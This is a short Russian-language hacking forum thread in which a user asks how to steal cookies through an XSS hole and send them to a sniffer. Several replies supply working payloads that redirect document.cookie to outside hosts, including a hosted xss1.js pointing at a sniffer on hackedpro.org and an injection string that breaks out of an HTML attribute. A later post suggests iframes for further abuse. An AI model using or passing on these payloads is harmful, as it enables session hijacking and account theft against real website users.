Java-скрипт перенапрваляющий на снифер

Discussion in 'Уязвимости' started by RamN999, 9 Nov 2007.

  1. RamN999

    RamN999 New Member

    Joined:
    7 Nov 2007
    Messages:
    3
    Likes Received:
    0
    Reputations:
    -5
    Добрый день!
    Подскажите пожалуста содержания скрипта
    чтоб он напрвалял куки на снифер.
    Например
    в xxs уязвимости я писал бы <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

    и получал бы куки на снифер..
    тоесть надо содержание xss.js

    спс
     
  2. __mad

    __mad Elder - Старейшина

    Joined:
    4 Nov 2007
    Messages:
    100
    Likes Received:
    38
    Reputations:
    7
    <script>document.location='http://ha.ckers.org/xss.js' +document.cookie</script>
     
  3. RamN999

    RamN999 New Member

    Joined:
    7 Nov 2007
    Messages:
    3
    Likes Received:
    0
    Reputations:
    -5
    Я сделал файл xss1.js с такаим содержание :
    <script>document.location='http://hackedpro.org/tools/sniff/s.gif' +document.cookie</script>

    И залил его сюда: http://xss999.jino-net.ru/xss1.js

    теперь я в найденой xss уязвимости пишу : "'><SCRIPT SRC=http://xss999.jino-net.ru/xss1.js></SCRIPT>


    но всёравно посемуто не получаю лог на снифер, где я ошибся?
     
  4. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    пиши в найденной xss "'><script>document.location='http://ha.ckers.org/xss.js' +document.cookie</script>
     
  5. __mad

    __mad Elder - Старейшина

    Joined:
    4 Nov 2007
    Messages:
    100
    Likes Received:
    38
    Reputations:
    7
    кароч читай вот это http://bugtraq.ru/library/www/xssanatomy.html
     
    1 person likes this.
  6. RamN999

    RamN999 New Member

    Joined:
    7 Nov 2007
    Messages:
    3
    Likes Received:
    0
    Reputations:
    -5
    Всё спс разобрался,но теперь ещё вопрос есть..
    Что можно сделать(помимо воровства куки) с помощью Xss уязвимости, если ваще нет никакой фильтрацции, тоесть допустимы любые теги?
     
  7. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    Ифрейм!)